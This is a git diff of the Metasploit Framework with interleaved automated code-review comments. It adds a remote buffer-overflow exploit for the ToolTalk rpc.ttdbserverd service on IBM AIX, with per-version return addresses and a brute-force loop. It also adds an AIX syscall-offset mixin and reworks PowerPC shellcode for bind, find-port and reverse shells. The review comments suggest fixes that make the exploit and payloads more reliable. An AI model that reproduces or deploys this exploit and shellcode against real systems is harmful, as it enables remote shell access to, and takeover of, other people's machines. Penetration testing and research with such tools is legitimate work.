diff --git a/lib/msf/core/auxiliary/report.rb b/lib/msf/core/auxiliary/report.rb
index 5233b5ca15..bf28ef02c9 100644
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -97,6 +97,11 @@ module Auxiliary::Report report_note(opts) end + def find_note(host, ntype) + return if not db + framework.db.find_note(host, ntype) + end + end end
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index b263493806..42db5bc4d6 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -234,6 +234,15 @@ class DBManager block.call(note) end end + + # + # Find a note matching this host address and note type + # + def find_note(host, ntype) + Note.find_by_ntype(ntype, :include => [:host], + :conditions => ['hosts.address = ?', host]) + end + # # This methods returns a list of all notes in the database
diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb
index aa9f44d017..6902529c33 100644
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -19,6 +19,7 @@ class Payload < Msf::Module require 'msf/core/payload/stager' # Platform specific includes + require 'msf/core/payload/aix' require 'msf/core/payload/bsd' require 'msf/core/payload/linux' require 'msf/core/payload/osx'
@@ -563,4 +564,4 @@ protected end -end
\ No newline at end of file
+end
diff --git a/lib/msf/core/payload/aix.rb b/lib/msf/core/payload/aix.rb
new file mode 100644
index 0000000000..282f84e251
--- /dev/null
+++ b/lib/msf/core/payload/aix.rb
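Review bot: `return if not db` in the new `Auxiliary::Report#find_note` is a style point only: it behaves exactly like `return unless db`, but the `if not` form is the one RuboCop flags and the one that reads worst next to the other guard clauses in this module. The method also has no header comment, whereas its DBManager counterpart in this same commit gets one; a one-liner such as `# Returns the note of type ntype recorded for host, or nil when no database is active` would document the nil-when-no-db contract that callers have to handle. The Auxiliary::Report module body continues outside the hunk.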
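Review bot: `DBManager#find_note` has no `:order`, so when a host carries several notes of the same `ntype` the row `find_by_ntype` returns is whichever the database yields first, not necessarily the most recent; the AIX payload mixin in this commit intends to read `note['data']` from it to select syscall offsets, where a stale record means a wrong table. If `Note` has a timestamp column, add `:order => 'notes.created_at DESC'` (or the column's real name) and mention it in the comment; otherwise document that the choice is arbitrary. The `host` argument only reaches SQL through the `?` placeholder, so it cannot be injected, but it has to be an address string — a `Host` record would never match — and naming the parameter `address` would make that explicit. DBManager's class body continues outside the hunk.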
@@ -0,0 +1,152 @@ +require 'msf/core' +require 'msf/core/auxiliary' + +### +# +# This class is here to implement advanced features for AIX-based +# payloads. AIX payloads are expected to include this module if +# they want to support these features. +# +### +module Msf::Payload::Aix + + include Msf::Auxiliary::Report + + # + # This mixin is chained within payloads that target the AIX platform. + # It provides special prepends, to support things like chroot and setuid + # and detect AIX version. + # + def initialize(info = {}) + ret = super(info) + + register_options( + [ + Msf::OptString.new('AIX', [ true, 'IBM AIX Version', '6.1.4' ]), + ], Msf::Payload::Aix) + + ret + end + + + # + # Overload the generate() call to prefix our stubs and detect AIX version + # + def generate(*args) + @aix = datastore['AIX'] + + #if not assoc_exploit.nil? + # note = find_note(assoc_exploit.rhost, 'AIX') + + # if not note.nil? + # @aix = note['data'] + # end + #end + + __CAL = 511 + + case @aix + when '6.1.4' + __NR_execve = 7 + __NR_getpeername = 211 + __NR_accept = 237 + __NR_listen = 240 + __NR_bind = 242 + __NR_socket = 243 + __NR_connect = 244 + __NR_close = 278 + __NR_kfcntl = 658 + + when '6.1.3' + __NR_execve = 7 + __NR_getpeername = 205 + __NR_accept = 232 + __NR_listen = 235 + __NR_bind = 237 + __NR_socket = 238 + __NR_connect = 239 + __NR_close = 272 + __NR_kfcntl = 644 + + when '6.1.2' + __NR_execve = 7 + __NR_getpeername = 205 + __NR_accept = 232 + __NR_listen = 235 + __NR_bind = 237 + __NR_socket = 238 + __NR_connect = 239 + __NR_close = 272 + __NR_kfcntl = 635 + + when '6.1.1' + __NR_execve = 7 + __NR_getpeername = 202 + __NR_accept = 229 + __NR_listen = 232 + __NR_bind = 234 + __NR_socket = 235 + __NR_connect = 236 + __NR_close = 269 + __NR_kfcntl = 614 + + when '6.1.0' + __NR_execve = 6 + __NR_getpeername = 203 + __NR_accept = 229 + __NR_listen = 232 + __NR_bind = 234 + __NR_socket = 235 + __NR_connect = 236 + __NR_close = 269 + __NR_kfcntl = 617 + + when '5.3.10', 
'5.3.9', '5.3.8', '5.3.7' + __NR_execve = 6 + __NR_getpeername = 198 + __NR_accept = 214 + __NR_listen = 215 + __NR_bind = 216 + __NR_socket = 217 + __NR_connect = 218 + __NR_close = 245 + __NR_kfcntl = 493 + + end + + __NC_execve = -(__CAL - __NR_execve) + __NC_getpeername = -(__CAL - __NR_getpeername) + __NC_accept = -(__CAL - __NR_accept) + __NC_listen = -(__CAL - __NR_listen) + __NC_bind = -(__CAL - __NR_bind) + __NC_socket = -(__CAL - __NR_socket) + __NC_connect = -(__CAL - __NR_connect) + __NC_close = -(__CAL - __NR_close) + __NC_kfcntl = -(__CAL - __NR_kfcntl) + + cal = "\x38\x5d" + @cal_execve = cal + [__NC_execve].pack('n') + @cal_getpeername = cal + [__NC_getpeername].pack('n') + @cal_accept = cal + [__NC_accept].pack('n') + @cal_listen = cal + [__NC_listen].pack('n') + @cal_bind = cal + [__NC_bind].pack('n') + @cal_socket = cal + [__NC_socket].pack('n') + @cal_connect = cal + [__NC_connect].pack('n') + @cal_close = cal + [__NC_close].pack('n') + @cal_kfcntl = cal + [__NC_kfcntl].pack('n') + + return '' + end + +protected + attr_accessor :aix + attr_accessor :cal_execve + attr_accessor :cal_getpeername + attr_accessor :cal_accept + attr_accessor :cal_bind + attr_accessor :cal_socket + attr_accessor :cal_connect + attr_accessor :cal_close + attr_accessor :cal_kfcntl + +end diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb new file mode 100644 index 0000000000..c0afc8be32 --- /dev/null +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb 
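Review bot: The `case @aix` in `Msf::Payload::Aix#generate` has no `else` branch, so an `AIX` value outside the listed levels (for instance `5.3.0`, the default of the `AIXLEVEL` option this commit removes from the three payloads, or any 4.x level they used to support) leaves `__NR_execve` and friends nil and the first `-(__CAL - __NR_execve)` dies with a TypeError from inside the arithmetic instead of an error naming the option. Add `else raise ArgumentError, "Unsupported AIX version: #{@aix.inspect}"` before the case's closing `end`, or register the option as an `OptEnum` over the supported levels so msfconsole rejects it at `set` time. The `protected` accessor list omits `:cal_listen` even though `@cal_listen` is assigned above and consumed by shell_bind_tcp; add `attr_accessor :cal_listen` for consistency. The commented-out `find_note` lookup leaves the `DBManager#find_note` added in this commit without a live caller, so either wire it up or mark that block with a TODO saying why it is disabled.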
@@ -0,0 +1,287 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::SunRPC + include Msf::Exploit::Brute + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in _tt_internal_realpath + function of the ToolTalk database server (rpc.ttdbserverd). + }, + 'Author' => + [ + 'Adriano Lima ', + 'Ramon de Carvalho Valle ' + ], + 'Version' => '$Revision$', + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Targets' => + [ + [ + 'IBM AIX Version 6.1.4', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099430+4096, + 'Addr1' => 0x2ff1ff50-8192, + 'AIX' => '6.1.4', + 'Payload' => { 'AIX' => '6.1.4' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099430-8192 }, + 'Stop' => { 'Ret' => 0x20099430+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.3', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.3', + 'Payload' => { 'AIX' => '6.1.3' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.2', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.2', + 'Payload' => { 'AIX' => '6.1.2' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.1', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 
0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.1', + 'Payload' => { 'AIX' => '6.1.1' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 6.1.0', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20099280+4096, + 'Addr1' => 0x2ff1ffd0-8192, + 'AIX' => '6.1.0', + 'Payload' => { 'AIX' => '6.1.0' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20099280-8192 }, + 'Stop' => { 'Ret' => 0x20099280+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096ba0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.9', + 'Payload' => { 'AIX' => '5.3.9' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096ba0-8192 }, + 'Stop' => { 'Ret' => 0x20096ba0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.10', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096bf0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.10', + 'Payload' => { 'AIX' => '5.3.10' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096bf0-8192 }, + 'Stop' => { 'Ret' => 0x20096bf0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.9', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096ba0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.9', + 'Payload' => { 'AIX' => '5.3.9' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096ba0-8192 }, + 'Stop' => { 'Ret' => 0x20096ba0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.8', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096c10+4096, + 'Addr1' => 0x2ff1ff98-8192, + 'AIX' => '5.3.8', + 'Payload' => { 'AIX' => '5.3.8' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096c10-8192 }, + 'Stop' => { 'Ret' => 0x20096c10+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.7', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 
0x20096c10+4096, + 'Addr1' => 0x2ff1ff98-8192, + 'AIX' => '5.3.7', + 'Payload' => { 'AIX' => '5.3.7' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096c10-8192 }, + 'Stop' => { 'Ret' => 0x20096c10+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'Debug IBM AIX Version 6.1', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0xaabbccdd, + 'Addr1' => 0xddccbbaa, + 'AIX' => '6.1.4', + 'Payload' => { 'AIX' => '6.1.4' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 1024 + } + } + ], + [ + 'Debug IBM AIX Version 5.3', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0xaabbccdd, + 'Addr1' => 0xddccbbaa, + 'AIX' => '5.3.10', + 'Payload' => { 'AIX' => '5.3.10' }, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 1024 + } + } + ], + ], + 'DefaultTarget' => 0)) + + end + + def brute_exploit(brute_target) + begin + print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret']) + + sunrpc_create('tcp', 100083, 1) + + if target['AIX'] =~ /6\./ + buf = "A" + else + buf = "AA" + end + + buf << [target['Addr1']].pack('N') * (1022 + 8) + buf << [brute_target['Ret']].pack('N') * 32 + + if target['AIX'] =~ /6\./ + buf << "AAA" + else + buf << "AA" + end + + buf << "\x7f\xff\xfb\x78" * 1920 + buf << payload.encoded + buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000) + + print_status('Sending procedure 15 call message...') + sunrpc_call(15, buf) + + sunrpc_destroy + handler + + rescue Rex::Proto::SunRPC::RPCTimeout + # print_error('RPCTimeout') + rescue EOFError + # print_error('EOFError') + end + end + +end + diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 85ae10e972..93e4b039cd 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb 
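Review bot: `sunrpc_destroy` in `brute_exploit` only runs on the success path; when `sunrpc_call` raises `RPCTimeout` or `EOFError` (both rescued and silently dropped at the end of the method) the connection opened by `sunrpc_create` is never torn down before the next brute-force iteration, and the rescues also discard the only diagnostic a user gets during a long brute. Move `sunrpc_destroy` into an `ensure` clause, guarded against the client being nil if `sunrpc_create` itself raised, and restore the commented-out `print_error` calls or a verbose-only equivalent. The module metadata also lacks `'License' => MSF_LICENSE`, `'Privileged' => true` and a `'References'` entry, all of which the sibling sadmind module touched in this commit carries; if rpc.ttdbserverd runs as root, as it typically does, `Privileged` should be set so the session is recorded accordingly.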
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'solaris', 'References' => [ - ['URL', 'http://risesecurity.org/advisory/RISE-2008001/'], + ['URL', 'http://risesecurity.org/advisories/RISE-2008001.txt'], ], 'Privileged' => true, 'License' => MSF_LICENSE,
@@ -164,4 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote XDR.encode(str, 3, 4, int, 0, 0) end -end
\ No newline at end of file
+end
diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb
index 470ccb0be4..6692f15539 100644
--- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb
+++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb
@@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Aix def initialize(info = {}) super(merge_info(info,
@@ -34,62 +35,17 @@ module Metasploit3 { 'Offsets' => { - 'LPORT' => [ 77, 'n' ], + 'LPORT' => [ 82, 'n' ], }, } )) - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) end - def generate - case datastore['AIXLEVEL'] - when '4.1.0' - cal_socket = "\x38\x5d\xfe\x58" # cal r2,-424(r29) # - cal_bind = "\x38\x5d\xfe\x57" # cal r2,-425(r29) # - cal_listen = "\x38\x5d\xfe\x56" # cal r2,-426(r29) # - cal_accept = "\x38\x5d\xfe\x54" # cal r2,-428(r29) # - cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) # - cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '4.2.0' - cal_socket = "\x38\x5d\xfe\x5c" # cal r2,-420(r29) # - cal_bind = "\x38\x5d\xfe\x5b" # cal r2,-421(r29) # - cal_listen = "\x38\x5d\xfe\x5a" # cal r2,-422(r29) # - cal_accept = "\x38\x5d\xfe\x59" # cal r2,-423(r29) # - cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) # - cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) # - cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) # - when '4.3.0' - cal_socket = "\x38\x5d\xfe\x6a" # cal r2,-406(r29) # - cal_bind = "\x38\x5d\xfe\x69" # cal r2,-407(r29) # - cal_listen = "\x38\x5d\xfe\x68" # cal r2,-408(r29) # - cal_accept = "\x38\x5d\xfe\x66" # cal r2,-410(r29) # - cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) # - cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) # - cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) # - when '4.3.3' - cal_socket = "\x38\x5d\xfe\x79" # cal r2,-391(r29) # - cal_bind = "\x38\x5d\xfe\x78" # cal r2,-392(r29) # - cal_listen = "\x38\x5d\xfe\x77" # cal r2,-393(r29) # - cal_accept = "\x38\x5d\xfe\x76" # cal r2,-394(r29) # - cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) # - cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '5.3.0' - cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) # - cal_bind = "\x38\x5d\xfe\x8d" # cal r2,-371(r29) # - cal_listen = 
"\x38\x5d\xfe\x8c" # cal r2,-372(r29) # - cal_accept = "\x38\x5d\xfe\x8b" # cal r2,-373(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end + def generate(*args) + super(*args) - payload = + payload = "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # "\x40\x82\xff\xfd" +# bnel # "\x7f\xc8\x02\xa6" +# mflr r30 # @@ -104,40 +60,40 @@ module Metasploit3 "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # "\x38\x9d\xfe\x02" +# cal r4,-510(r29) # "\x38\x7d\xfe\x03" +# cal r3,-509(r29) # - cal_socket + + @cal_socket + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\x7c\x1b\x78" +# mr r28,r3 # "\x38\xbd\xfe\x11" +# cal r5,-495(r29) # "\x3f\x60\xff\x02" +# liu r27,-254 # - "\x63\x7b\x04\xd2" +# oril r27,r27,1234 # + "\x63\x7b\x11\x5c" +# oril r27,r27,4444 # "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # "\x97\x61\xff\xfc" +# stu r27,-4(r1) # "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_bind + + @cal_bind + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_listen + + @cal_listen + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\x83\xe3\x78" +# mr r3,r28 # - cal_accept + + @cal_accept + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7c\x7a\x1b\x78" +# mr r26,r3 # "\x3b\x3d\xfe\x03" +# cal r25,-509(r29) # "\x7f\x23\xcb\x78" +# mr r3,r25 # - cal_close + + @cal_close + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7f\x25\xcb\x78" +# mr r5,r25 # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\x43\xd3\x78" +# mr r3,r26 # - cal_kfcntl + + @cal_kfcntl + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x37\x39\xff\xff" +# ai. r25,r25,-1 # 
@@ -151,9 +107,9 @@ module Metasploit3 "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # "\x94\x61\xff\xfc" +# stu r3,-4(r1) # "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + + @cal_execve + "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # + "\x4e\x80\x04\x21" +# bctrl # "/bin/csh" end
diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb
index c1cc8fda54..f8e512affe 100644
--- a/modules/payloads/singles/aix/ppc/shell_find_port.rb
+++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb
@@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Aix def initialize(info = {}) super(merge_info(info,
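Review bot: The execve tail now ends in `bctrl` (`\x4e\x80\x04\x21`) while the identical tail in shell_find_port.rb and shell_reverse_tcp.rb, touched in this same commit, keeps `bctr` (`\x4e\x80\x04\x20`). Every other syscall stub in these payloads uses `mtctr r30; bctrl`, presumably so the link register points past the call when the kernel returns, so if that matters for the execve path the other two payloads need the same change, and if it does not, this one-off divergence is confusing. Either way the changed line deserves a comment, e.g. `# bctrl rather than bctr: set LR so a failed execve returns past the stub`, with the caveat that after `bctrl` a failing execve lands in the "/bin/csh" bytes, which is only acceptable because there is nothing to do on failure anyway.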
@@ -39,42 +40,12 @@ module Metasploit3 } )) - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) end - def generate - case datastore['AIXLEVEL'] - when '4.1.0' - cal_getpeername = "\x38\x5d\xfe\x44" # cal r2,-444(r29) # - cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) # - cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '4.2.0' - cal_getpeername = "\x38\x5d\xfe\x49" # cal r2,-439(r29) # - cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) # - cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) # - cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) # - when '4.3.0' - cal_getpeername = "\x38\x5d\xfe\x56" # cal r2,-426(r29) # - cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) # - cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) # - cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) # - when '4.3.3' - cal_getpeername = "\x38\x5d\xfe\x66" # cal r2,-410(r29) # - cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) # - cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '5.3.0' - cal_getpeername = "\x38\x5d\xfe\x7b" # cal r2,-389(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end + def generate(*args) + super(*args) - payload = + payload = "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # "\x40\x82\xff\xfd" +# bnel # "\x7f\xc8\x02\xa6" +# mflr r30 # 
@@ -96,22 +67,22 @@ module Metasploit3 "\x7f\x65\xdb\x78" +# mr r5,r27 # "\x7f\x84\xe3\x78" +# mr r4,r28 # "\x7f\xe3\xfb\x78" +# mr r3,r31 # - cal_getpeername + + @cal_getpeername + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x3b\x5c\x01\xff" +# cal r26,511(r28) # "\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) # - "\x28\x1a\x04\xd2" +# cmpli 0,r26,1234 # + "\x28\x1a\x11\x5c" +# cmpli 0,r26,4444 # "\x40\x82\xff\xd4" +# bne # "\x3b\x3d\xfe\x03" +# cal r25,-509(r29) # "\x7f\x23\xcb\x78" +# mr r3,r25 # - cal_close + + @cal_close + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x7f\x25\xcb\x78" +# mr r5,r25 # "\x7c\x84\x22\x78" +# xor r4,r4,r4 # "\x7f\xe3\xfb\x78" +# mr r3,r31 # - cal_kfcntl + + @cal_kfcntl + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x21" +# bctrl # "\x37\x39\xff\xff" +# ai. r25,r25,-1 # @@ -125,7 +96,7 @@ module Metasploit3 "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # "\x94\x61\xff\xfc" +# stu r3,-4(r1) # "\x7c\x24\x0b\x78" +# mr r4,r1 # - cal_execve + + @cal_execve + "\x7f\xc9\x03\xa6" +# mtctr r30 # "\x4e\x80\x04\x20" +# bctr # "/bin/csh" diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index 1c2c399876..7b2d217076 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -18,6 +18,7 @@ require 'msf/base/sessions/command_shell' module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Aix def initialize(info = {}) super(merge_info(info, 
@@ -40,47 +41,12 @@ module Metasploit3 } )) - register_options( - [ - OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]), - ], self.class) end - def generate - case datastore['AIXLEVEL'] - when '4.1.0' - cal_socket = "\x38\x5d\xfe\x58" # cal r2,-424(r29) # - cal_connect = "\x38\x5d\xfe\x59" # cal r2,-423(r29) # - cal_close = "\x38\x5d\xfe\x5f" # cal r2,-417(r29) # - cal_kfcntl = "\x38\x5d\xfe\xd7" # cal r2,-297(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '4.2.0' - cal_socket = "\x38\x5d\xfe\x5c" # cal r2,-420(r29) # - cal_connect = "\x38\x5d\xfe\x5d" # cal r2,-419(r29) # - cal_close = "\x38\x5d\xfe\x63" # cal r2,-413(r29) # - cal_kfcntl = "\x38\x5d\xfe\xe8" # cal r2,-280(r29) # - cal_execve = "\x38\x5d\xfe\x03" # cal r2,-509(r29) # - when '4.3.0' - cal_socket = "\x38\x5d\xfe\x6a" # cal r2,-406(r29) # - cal_connect = "\x38\x5d\xfe\x6b" # cal r2,-405(r29) # - cal_close = "\x38\x5d\xfe\x72" # cal r2,-398(r29) # - cal_kfcntl = "\x38\x5d\xfe\xfd" # cal r2,-259(r29) # - cal_execve = "\x38\x5d\xfe\x05" # cal r2,-507(r29) # - when '4.3.3' - cal_socket = "\x38\x5d\xfe\x79" # cal r2,-391(r29) # - cal_connect = "\x38\x5d\xfe\x7a" # cal r2,-390(r29) # - cal_close = "\x38\x5d\xfe\x83" # cal r2,-381(r29) # - cal_kfcntl = "\x38\x5d\xff\x10" # cal r2,-240(r29) # - cal_execve = "\x38\x5d\xfe\x04" # cal r2,-508(r29) # - when '5.3.0' - cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) # - cal_connect = "\x38\x5d\xfe\x8f" # cal r2,-369(r29) # - cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) # - cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) # - cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) # - end + def generate(*args) + super(*args) - payload = + payload = "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # "\x40\x82\xff\xfd" +# bnel # "\x7f\xc8\x02\xa6" +# mflr r30 # 
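Review bot: Renaming the option from `AIXLEVEL` (default `5.3.0`) to the mixin's `AIX` (default `6.1.4`) silently changes which syscall table is emitted for anyone who still has `set AIXLEVEL ...` in a resource script or saved datastore: as far as I recall the datastore accepts unknown keys without complaint, so the old setting is ignored and 6.1.4 offsets go out against a 5.3 target, which shows up only as a crash of the exploited daemon. Consider a transitional warning in `Msf::Payload::Aix#generate` along the lines of `print_warning("AIXLEVEL is no longer used; set AIX instead") if datastore['AIXLEVEL']`, and note the rename in the module description. The old default `5.3.0` is itself not a level the mixin knows, so even an explicit `set AIX 5.3.0` fails. `generate` continues into the next hunk.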
